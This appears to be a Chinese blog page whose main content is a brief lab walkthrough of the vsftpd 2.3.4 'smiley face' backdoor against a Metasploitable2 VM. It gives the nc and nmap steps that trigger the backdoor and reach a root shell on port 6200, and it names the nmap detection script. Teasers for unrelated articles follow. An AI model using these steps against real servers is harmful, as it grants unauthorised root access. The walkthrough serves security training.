张小明
前端开发工程师
一、实验准备:
1、Metaspolitable2(靶机)
2、kali
二、实验步骤:
1、打开kali和靶机,两者都要处于NAT模式
2、在终端使用命令(ip addr)查看kali的ip 然后nmap+kali IP,得到靶机ip
3、执行nmap -sV +(靶机IP)得到端口服务信息
4.手动模拟FTP登录,nc 192.168.61.130 21 回车后输入FTP用户名USER 1:),回车输入密码PASS 123,然后就可以crtl+C退出当前nc连接,注意:用户名一定要带有“:)”这个是触发笑脸漏洞的关键,密码任意都行。
5、nmap 192.168.61.130 -p 6200就可以连接到靶机的后门,拿到root权限。
三、正式的NSE-nmap脚本
针对VSFTPD v2.3.4的检测脚本它的方法为--script加上脚本名即nmap --script ftp-vsftpd-backdoor 192.168.61.130
本文只做分享,不做它用
ncmdump是一款专门用于处理网易云音乐NCM加密格式的开源工具,能够将受保护的.ncm文件转换为通用的MP3等音频格式。无论你是偶尔下载歌曲的轻度用户,还是拥有大量音乐收藏的重度爱好者,这款工具都能帮助你轻松实现格式转换,让音乐真…
李华
Dify平台与Azure OpenAI服务对接实操记录 在企业智能化转型的浪潮中,如何快速、安全地构建生产级 AI 应用成为技术团队的核心命题。许多组织面临这样的困境:一方面,大模型能力诱人;另一方面,直接调用底层 API 开发周期…
李华
经济研究LaTeX模板深度技术部署指南 【免费下载链接】Chinese-ERJ 《经济研究》杂志 LaTeX 论文模板 - LaTeX Template for Economic Research Journal 项目地址: https://gitcode.com/gh_mirrors/ch/Chinese-ERJ 技术方案价值定位 在学术论文撰写过程中,格…
李华
LenovoLegionToolkit终极指南:智能电源管理与性能优化完全攻略 【免费下载链接】LenovoLegionToolkit Lightweight Lenovo Vantage and Hotkeys replacement for Lenovo Legion laptops. 项目地址: https://gitcode.com/gh_mirrors/le/LenovoLegionToolkit 电…
李华
终极指南:如何在Windows、Mac和Ubuntu上使用iFakeLocation模拟iOS设备位置 【免费下载链接】iFakeLocation Simulate locations on iOS devices on Windows, Mac and Ubuntu. 项目地址: https://gitcode.com/gh_mirrors/if/iFakeLocation iOS位置模拟工具iFa…
李华
如何彻底解决Keil5中文乱码问题?工业网关开发者的实战指南在嵌入式开发一线摸爬滚打的工程师都知道,一个看似不起眼的“小问题”——Keil5中文乱码,往往能让你加班到深夜。尤其是在工业网关这类复杂项目中,代码里夹着中文注释、工…
李华